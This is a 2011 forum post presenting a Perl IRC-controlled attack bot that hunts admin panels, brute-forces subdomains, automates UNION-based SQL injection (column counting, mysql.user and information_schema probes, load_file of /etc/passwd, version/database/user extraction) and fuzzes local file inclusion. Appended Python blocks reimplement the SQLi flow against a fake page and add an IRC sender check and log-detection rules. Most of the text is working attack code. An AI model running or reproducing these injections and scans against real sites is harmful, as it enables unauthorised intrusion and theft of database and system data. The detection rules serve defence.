[Perl] Terr0r B0t By Doddy H
Author: BigBear
« on: 7 October 2011, 15:55 »

Hello everyone.

Today I bring you a program I wrote last night. It is an IRC bot with the following options:

* Base64, hex and ASCII encoding and decoding
* Search for a site's administration panel
* SQLi scan (finds the number of columns and gives info)
* Tool to exploit LFI

Commands for the bot in the channel

Code:
!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='

Usage:

Code:
C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online


Code:
#!/usr/bin/perl
# Terr0r B0t (C) Doddy Hackman 2010
# Commands to use (typed in the IRC channel):
#
# !base64 encode/decode string
# !hex encode/decode string
# !ascii encode/decode string
# !panel http://127.0.0.1
# !sqli http://127.0.0.1/sql.php?id=
# !lfi http://127.0.0.1/lfi.php?file='
# !fuzzdns example.com   (implemented below but missing from the original command list)
#
# Optional first argument: "/*" or "%20" changes the separator/comment pair used in the
# SQL payloads (default is "+" and "--"), see bypass().
#
# Note: the bot runs a command for anyone who can speak in the channel; there is no sender check.

use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;
use MIME::Base64;

# Hostname prefixes tried by !fuzzdns as http://<prefix>.<domain>
@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','border','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','secure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','lotus','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');

# Paths tried by !panel as <url>/<path>
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');

# Files appended to the URL by !lfi. The original post never defined this list (the loop ran over
# an empty array); the entries below are an assumed starting point, not the author's.
@buscar3 = ('/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','/proc/self/environ','../../../../../../../../etc/passwd%00');

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";

my $servidor = "127.0.0.1";    # IRC server
my $canal    = "#locos";       # IRC channel on that server
my $nick     = "Lepuke-Slave"; # Bot nickname
my $port     = "6667";         # IRC server port
my $bypass   = defined $ARGV[0] ? $ARGV[0] : ""; # SQL payload style, see bypass()

print "[+] Starting the bot\n";

my $soquete = new IO::Socket::INET( PeerAddr => $servidor,
                                    PeerPort => $port,
                                    Proto    => 'tcp' );

if (!$soquete) {
    print "\n[-] Could not connect to $servidor $port\n";
    exit 1;
}

print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 0 * :$nick\r\n";

print "[+] Online\n\n";

while ( my $log = <$soquete> ) {
    $log =~ s/\r?\n$//;   # lines end in CRLF; a plain chomp would leave the \r inside every argument

    # Keep the connection alive
    if ($log =~ /^PING(.*)$/i) {
        print $soquete "PONG $1\r\n";
    }

    # Join the channel once the server has accepted the registration (numeric 001)
    if ($log =~ /^:\S+ 001 /) {
        print $soquete "JOIN $canal\r\n";
    }

    if ($log =~ m/:!panel (.*)$/) {
        scan($1);
        msg("[+] Scan Finished");
    }

    if ($log =~ m/:!sqli (.*)$/) {
        msg("[+] SQL Scan Starting");
        scan2($1);
    }

    if ($log =~ m/:!fuzzdns (.*)$/) {
        scan1($1);
        msg("[+] Scan Finished");
    }

    if ($log =~ m/:!lfi (.*)$/) {
        lfi($1);
        msg("[+] Scan Finished");
    }

    # Encoders: the option is the first word, everything after it is the data
    if ($log =~ m/:!base64 (\S+) (.*)$/) {
        my ($opcion,$aa) = ($1,$2);
        if ($opcion eq "encode") {
            msg("[+] Text : $aa");
            msg("[+] Encode : ".encode_base64($aa,''));
        }
        elsif ($opcion eq "decode") {
            msg("[+] Encode : $aa");
            msg("[+] Text : ".decode_base64($aa));
        }
        else {
            msg("??");
        }
    }

    if ($log =~ m/:!ascii (\S+) (.*)$/) {
        my ($opcion,$aa) = ($1,$2);
        if ($opcion eq "encode") {
            msg("[+] Text : $aa");
            msg("[+] Encode : ".ascii($aa));
        }
        elsif ($opcion eq "decode") {
            msg("[+] Encode : $aa");
            msg("[+] Text : ".ascii_de($aa));
        }
        else {
            msg("???");
        }
    }

    if ($log =~ m/:!hex (\S+) (.*)$/) {
        my ($opcion,$aa) = ($1,$2);
        if ($opcion eq "encode") {
            msg("[+] Text : $aa");
            msg("[+] Encode : ".encode($aa));
        }
        elsif ($opcion eq "decode") {
            msg("[+] Encode : $aa");
            msg("[+] Text : ".decode($aa));
        }
        else {
            msg("????");
        }
    }
}

# Send one line to the channel. CR/LF inside the text (for example from a decoded string) would
# otherwise be read by the server as the start of another IRC command.
sub msg {
    my $texto = $_[0];
    $texto =~ s/[\r\n]+/ /g;
    print $soquete "PRIVMSG $canal :$texto\r\n";
}

# !lfi: look for the PHP "No such file or directory" warning, then append each file from @buscar3
sub lfi {
    my $url = $_[0];
    my $ok  = 0;
    msg("[+] Target confirmed : $url");
    msg("[+] Status : [scanning]");
    my $code = toma($url);
    if ($code =~ /No such file or directory in <b>(.*)<\/b> on line/i) {
        msg("[+] Vulnerable !");
        msg("[*] Full path disclosure detected : $1");
        msg("[+] Status : [fuzzing files]");
        for my $file (@buscar3) {
            my $code1 = toma($url.$file);
            unless ($code1 =~ /No such file or directory in <b>(.*)<\/b> on line/i) {
                $ok = 1;
                msg("[File Found] : ".$url.$file);
            }
        }
        unless ($ok) {
            msg("[-] No file found");
        }
    } else {
        msg("[-] Page not vulnerable to LFI");
    }
}

# !fuzzdns: report every <prefix>.<domain> that answers HTTP with a 2xx
sub scan1 {
    my $dominio = $_[0];
    msg("[*] Searching DNS to $dominio");
    for my $path (@dns) {
        my $code = tomax("http://".$path.".".$dominio);
        if ($code->is_success) {
            msg("http://".$path.".".$dominio);
        }
    }
}

# !panel: report every <url>/<path> that answers with a 2xx
sub scan {
    my $url = $_[0];
    my $ct  = 0;
    msg("[*] Searching panels to $url");
    for my $path (@panels) {
        my $code = tomax($url."/".$path);
        if ($code->is_success) {
            print "\a";
            $ct = 1;
            msg("[Link] : ".$url."/".$path);
        }
    }
    unless ($ct) {
        msg("[-] Not found any path");
    }
}

# !sqli: error check, then column count by growing a UNION SELECT with marker columns
sub scan2 {
    my $page = $_[0];
    my $asc  = "";
    my ($pass1,$pass2) = bypass($bypass);

    # Step 1: a broken ORDER BY must produce a MySQL error on a vulnerable page
    my $inyection = $page."-1".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
    my $code = toma($inyection);
    if ($code =~ /supplied argument is not a valid MySQL result resource/i || $code =~ /mysql_free_result/i || $code =~ /mysql_fetch_assoc/i || $code =~ /mysql_num_rows/i || $code =~ /mysql_fetch_array/i || $code =~ /mysql_query/i || $code =~ /equivocado en su sintax/i || $code =~ /You have an error in your SQL syntax/i || $code =~ /Call to undefined function/i) {
        # Full path disclosure, if the PHP warning shows it
        my $path = ($code =~ /in <b>(.*?)<\/b> on line/i) ? $1 : "";
        # Step 2: a one-column UNION must fail with the column-count error
        my $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
        if ($code1 =~ /The used SELECT statements have a different number of columns/i) {
            # Step 3: add one marker column at a time until some marker shows up in the page
            my $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
            my $total = "1";
            for my $rows (2..52) {
                $asc   .= ",char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
                $total .= ",".$rows;
                my $injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
                my $test = toma($injection);
                if ($test =~ /RATSXPDOWN(\d+)RATSXPDOWN/) {
                    my @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
                    msg("[Page] : $page");
                    msg("[Limit] : The site has $rows columns");
                    msg("[Data] : Column(s) @number print data");
                    if ($path) {
                        msg("[Full Path Disclosure] : $path");
                    }
                    # Replace the first column that prints with the placeholder details() fills in
                    $total =~ s/\b$number[0]\b/hackman/;
                    msg("[+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total);
                    details($page."-1".$pass1."union".$pass1."select".$pass1.$total);
                    last;
                }
            }
        }
    }
}

# Put probes into the printing column: information_schema, mysql.user, load_file and version()/database()/user()
sub details {
    my $page = $_[0];
    my ($pass1,$pass2) = bypass($bypass);
    if ($page =~ /(.*)hackman(.*)/i) {
        my $start = $1; my $end = $2;
        # char(69,82,84,79,82,56,53,52) is "ERTOR854", the marker that shows where our output lands;
        # 0x2f6574632f706173737764 is "/etc/passwd"
        my $test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
        my $test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
        my $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
        if ($test2 =~ /ERTOR854/i) {
            msg("[+] Users can be listed through mysql.user");
        }
        if ($test1 =~ /ERTOR854/i) {
            msg("[+] Everything can be read through information_schema");
        }
        if ($test3 =~ /ERTOR854/i) {
            msg("[+] load_file allows reading files");
        }
        my $code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
        if ($code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/) {
            msg("[!] DB Version : $1");
            msg("[!] DB Name : $2");
            msg("[!] user_name : $3");
        } else {
            msg("[-] Not found any data");
        }
        msg("[+] Scan Finished");
    }
}

# Separator and comment pair used in the SQL payloads, chosen with the optional first argument
sub bypass {
    my $modo = defined $_[0] ? $_[0] : "";
    if ($modo eq "/*")     { return ("/**/","/*"); }
    elsif ($modo eq "%20") { return ("%20","%00"); }
    else                   { return ("+","--"); }
}

# "abc" -> "97,98,99" (used to build char(...) so the payload needs no quotes)
sub ascii {
    return join ',', unpack "U*", $_[0];
}

sub ascii_de {
    return join '', map { chr } split ',', $_[0];
}

# "abc" -> "0x616263" (two hex digits per byte, so it decodes back correctly)
sub encode {
    my $hex = '0x';
    for (split //, $_[0]) {
        $hex .= sprintf "%02x", ord;
    }
    return $hex;
}

sub decode {
    my $hex = $_[0];
    $hex =~ s/^0x//;
    return join '', map { chr hex } $hex =~ /../g;
}

# Fetch a URL and return only the body
sub toma {
    return $nave->request(GET $_[0])->content;
}

# Fetch a URL and return the whole response (for status checks)
sub tomax {
    return $nave->request(GET $_[0]);
}

#The End




« Last edit: 8 October 2011, 19:09 by Doddy »
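The bot above drives everything from regexes such as `m/:!panel (.*)$/` applied to the raw socket line, which means any nick in the channel (or anyone who private-messages the bot) can start a scan, `(.*) (.*)$` splits "encode hello world" in the wrong place, and a decoded string containing CR/LF would be written to the socket as a second IRC command. The following is an added example, not part of the original post and not the author's code: a small RFC 1459 line parser with the checks a bot operator would want. The nicks, channel name and sample lines are constructed for the example; the allowed-operator set is an assumption (the original bot has no such check).

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed lines, as a server would deliver them to the bot (not a capture from a real network).
SAMPLE_LINES = [
    "PING :irc.example.net\r\n",
    ":irc.example.net 001 Lepuke-Slave :Welcome to the network\r\n",
    ":Op!op@example.net PRIVMSG #locos :!base64 encode hello world\r\n",
    ":Stranger!x@203.0.113.9 PRIVMSG #locos :!sqli http://127.0.0.1/sql.php?id=\r\n",
    ":Op!op@example.net PRIVMSG #locos :the !panel scan is running\r\n",
    ":Op!op@example.net PRIVMSG Lepuke-Slave :!hex decode 0x414243\r\n",
]

CHANNEL = "#locos"
ALLOWED_OPERATORS = {"Op"}   # assumption: only this nick may drive the scanner


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str] = field(default_factory=list)


def parse_irc_line(line: str) -> IrcMessage:
    """Split an RFC 1459 line into prefix, command and params.

    The trailing parameter (after ' :') may contain spaces; everything before it is space-separated."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    words = head.split()
    if not words:
        raise ValueError("IRC line without a command")
    params = words[1:]
    if sep:
        params.append(trailing)
    return IrcMessage(prefix, words[0], params)


def nick_of(prefix: Optional[str]) -> Optional[str]:
    """'nick!user@host' -> 'nick'; server prefixes have no '!' and are returned whole."""
    return prefix.split("!", 1)[0] if prefix else None


def bot_command(msg: IrcMessage) -> Optional[Tuple[str, str]]:
    """(name, argument) for a '!command' spoken in CHANNEL by an allowed nick, else None.

    Unlike the original regexes this ignores commands buried mid-sentence, commands sent in
    private, and commands from nicks outside ALLOWED_OPERATORS."""
    if msg.command != "PRIVMSG" or len(msg.params) != 2:
        return None
    target, text = msg.params
    if target != CHANNEL or not text.startswith("!"):
        return None
    if nick_of(msg.prefix) not in ALLOWED_OPERATORS:
        return None
    name, _, arg = text[1:].partition(" ")
    return name, arg


def split_codec_arg(arg: str) -> Tuple[str, str]:
    """'encode hello world' -> ('encode', 'hello world').

    The bot's '(.*) (.*)$' would yield ('encode hello', 'world') because the first group is greedy."""
    op, _, data = arg.partition(" ")
    return op, data


def reply_for(line: str) -> Optional[str]:
    """Protocol-level answer the bot should send for one inbound line, or None."""
    msg = parse_irc_line(line)
    if msg.command == "PING":
        return "PONG :" + msg.params[0]
    if msg.command == "001":          # registration accepted: now it is safe to JOIN
        return "JOIN " + CHANNEL
    return None


def outbound_privmsg(text: str) -> str:
    """Build a PRIVMSG to CHANNEL, folding CR/LF so decoded user data cannot inject a second command."""
    safe = text.replace("\r", " ").replace("\n", " ")
    return "PRIVMSG " + CHANNEL + " :" + safe + "\r\n"
```

With the sample lines, only the third one yields a command (`("base64", "encode hello world")`); the `!sqli` from "Stranger", the `!panel` mentioned mid-sentence and the private `!hex` are all dropped, and `outbound_privmsg("a\r\nQUIT")` sends a single line.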

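The `!sqli` handler (scan2 and details in the bot) works in three steps: provoke a MySQL error with a broken ORDER BY, confirm a one-column UNION fails with the column-count error, then grow a UNION SELECT one `char(...)` marker column at a time until a marker is echoed in the page, and finally put `concat(...)` of `version()`, `database()` and `user()` into the echoed column. The block below is an added example, not part of the original post and not the author's code, that reimplements that logic as pure functions and runs it against a constructed stand-in page (a fake that echoes its second of three columns), so the flow can be followed offline. The hypothetical `fetch` callable, the fake page and its URL are assumptions of the example.

```python
import re
from typing import Callable, List, Optional, Tuple

MARK = "RATSXPDOWN"
SEP, TAIL = "+", "--"            # the bot's default bypass() separator / comment pair
MYSQL_ERRORS = (
    "supplied argument is not a valid MySQL result resource",
    "You have an error in your SQL syntax",
    "mysql_fetch_array", "mysql_num_rows",
)


def ascii_list(s: str) -> str:
    """'abc' -> '97,98,99' (the bot's ascii() helper), so the payload needs no quote characters."""
    return ",".join(str(ord(c)) for c in s)


def mysql_char(s: str) -> str:
    return "char(" + ascii_list(s) + ")"


def looks_injectable(body: str) -> bool:
    """Step 1: any of the PHP/MySQL error strings the bot greps for."""
    low = body.lower()
    return any(e.lower() in low for e in MYSQL_ERRORS)


def union_probe(base_url: str, ncols: int) -> str:
    """Step 3 payload: -1 UNION SELECT with a numbered marker in every column."""
    cols = [mysql_char(f"{MARK}{i}{MARK}") for i in range(1, ncols + 1)]
    return f"{base_url}-1{SEP}union{SEP}select{SEP}" + ",".join(cols)


def reflected_columns(body: str) -> List[int]:
    """Column numbers whose marker came back in the HTML."""
    return sorted({int(n) for n in re.findall(MARK + r"(\d+)" + MARK, body)})


def find_columns(fetch: Callable[[str], str], base_url: str, max_cols: int = 52) -> Optional[Tuple[int, List[int]]]:
    """Grow the column list until a marker is reflected: (column_count, columns_that_print) or None."""
    for n in range(1, max_cols + 1):
        hit = reflected_columns(fetch(union_probe(base_url, n)))
        if hit:
            return n, hit
    return None


def build_extraction(base_url: str, ncols: int, slot: int, expr: str) -> str:
    """Put `expr` into the printing column (the bot's 'hackman' placeholder step) and close the query."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    return f"{base_url}-1{SEP}union{SEP}select{SEP}" + ",".join(cols) + TAIL


def run(fetch: Callable[[str], str], base_url: str) -> Optional[str]:
    """Whole scan2 flow; returns the URL that prints version()/database()/user() between ERTOR854 markers."""
    if not looks_injectable(fetch(f"{base_url}-1{SEP}order{SEP}by{SEP}9999999999{TAIL}")):
        return None
    found = find_columns(fetch, base_url)
    if not found:
        return None
    ncols, slots = found
    m = mysql_char("ERTOR854")   # char(69,82,84,79,82,56,53,52), the bot's output marker
    expr = f"concat({m},version(),{m},database(),{m},user(),{m})"
    return build_extraction(base_url, ncols, slots[0], expr)


# --- Constructed stand-in for a vulnerable page (three columns, echoes column 2). Not a real site. ---
def fake_target(url: str) -> str:
    if "order+by" in url:
        return ("Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result "
                "resource in <b>/var/www/sql.php</b> on line 12")
    m = re.search(r"union\+select\+(.*?)(?:--)?$", url)
    if not m:
        return "<html><body>item</body></html>"
    cols = re.split(r",(?![^(]*\))", m.group(1))      # split on commas outside char(...)
    if len(cols) != 3:
        return "The used SELECT statements have a different number of columns"
    val = cols[1]
    c = re.fullmatch(r"char\(([\d,]+)\)", val)
    if c:                                              # decode char(...) the way MySQL would
        val = "".join(chr(int(x)) for x in c.group(1).split(","))
    return f"<html><body><b>{val}</b></body></html>"
```

Against `fake_target`, `find_columns` stops at three columns with column 2 printing, and `run` returns the `id=-1+union+select+1,concat(...),3--` URL that the bot would then fetch and parse with `ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854`.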
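From the defender's side, every one of the bot's commands leaves a recognisable trace in the web server log: a burst of 404s across the `@panels` wordlist from one address, `union+select` / `order+by` and the `RATSXPDOWN` and `ERTOR854` markers in query strings, `../` and `/etc/passwd` in the `!lfi` probes, and the hard-coded User-Agent, which is missing the space before "Firefox" and so never matches a real browser. The block below is an added example, not part of the original post and not the author's code: detection logic run over constructed Apache combined-format lines. The IP addresses, timestamps and thresholds are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Set

# The bot's hard-coded User-Agent; note "Gecko/20080201Firefox" with no space.
BOT_UA = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) "
          "Gecko/20080201Firefox/2.0.0.12")


def _line(ip: str, ts: str, path: str, status: int, ua: str) -> str:
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 210 "-" "{ua}"'


# Constructed log lines, not from a real server: eight from a host running the bot's
# !panel, !sqli and !lfi commands, and one ordinary visitor.
SAMPLE_LOG = [
    _line("203.0.113.7", "07/Oct/2011:15:55:01 +0000", "/admin/admin.asp", 404, BOT_UA),
    _line("203.0.113.7", "07/Oct/2011:15:55:01 +0000", "/admin/login.asp", 404, BOT_UA),
    _line("203.0.113.7", "07/Oct/2011:15:55:02 +0000", "/admin/index.asp", 404, BOT_UA),
    _line("203.0.113.7", "07/Oct/2011:15:55:02 +0000", "/login.php", 404, BOT_UA),
    _line("203.0.113.7", "07/Oct/2011:15:55:03 +0000", "/administrator/", 404, BOT_UA),
    _line("203.0.113.7", "07/Oct/2011:15:55:03 +0000", "/phpmyadmin/", 404, BOT_UA),
    _line("203.0.113.7", "07/Oct/2011:15:56:10 +0000",
          "/sql.php?id=-1+union+select+char(82,65,84),2,3", 200, BOT_UA),
    _line("203.0.113.7", "07/Oct/2011:15:56:40 +0000",
          "/lfi.php?file='../../../../etc/passwd", 200, BOT_UA),
    _line("198.51.100.4", "07/Oct/2011:15:57:00 +0000", "/index.html", 200,
          "Mozilla/5.0 (X11; Linux x86_64; rv:7.0) Gecko/20100101 Firefox/7.0"),
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
ADMIN_PATH = re.compile(r"admin|login|webmaster|controlpanel|cpanel|phpmyadmin|moderator|yonetim", re.I)
SQLI_PROBE = re.compile(r"union[+ /*]+select|order[+ /*]+by|RATSXPDOWN|ERTOR854|information_schema|load_file\(", re.I)
LFI_PROBE = re.compile(r"\.\./|/etc/passwd|/proc/self/environ", re.I)


def parse_line(line: str) -> Optional[dict]:
    """Combined-format line -> dict with ip, ts (aware datetime), method, path, status, ua; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyze(lines: List[str], panel_threshold: int = 5, window_seconds: int = 60) -> Dict[str, Set[str]]:
    """Map finding kind -> source IPs.

    Rules: the bot's UA string; SQLi or LFI probe strings in the URL; and at least panel_threshold
    distinct admin-looking paths answered 404 from one IP inside window_seconds (the wordlist walk)."""
    findings: Dict[str, Set[str]] = defaultdict(set)
    admin_404s: Dict[str, list] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if BOT_UA in rec["ua"]:
            findings["terr0r-bot-ua"].add(ip)
        if SQLI_PROBE.search(path):
            findings["sqli-probe"].add(ip)
        if LFI_PROBE.search(path):
            findings["lfi-probe"].add(ip)
        if rec["status"] == "404" and ADMIN_PATH.search(path):
            admin_404s[ip].append((rec["ts"], path))
    for ip, hits in admin_404s.items():          # sliding time window per source IP
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while (hits[end][0] - hits[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({p for _, p in hits[start:end + 1]}) >= panel_threshold:
                findings["panel-bruteforce"].add(ip)
                break
    return dict(findings)
```

On the sample, all four rules fire for 203.0.113.7 and nothing fires for the ordinary visitor; raising `panel_threshold` above the six admin paths in the sample drops only the brute-force finding, which is the knob to tune against real traffic (an admin who mistypes a URL a few times must not trip it).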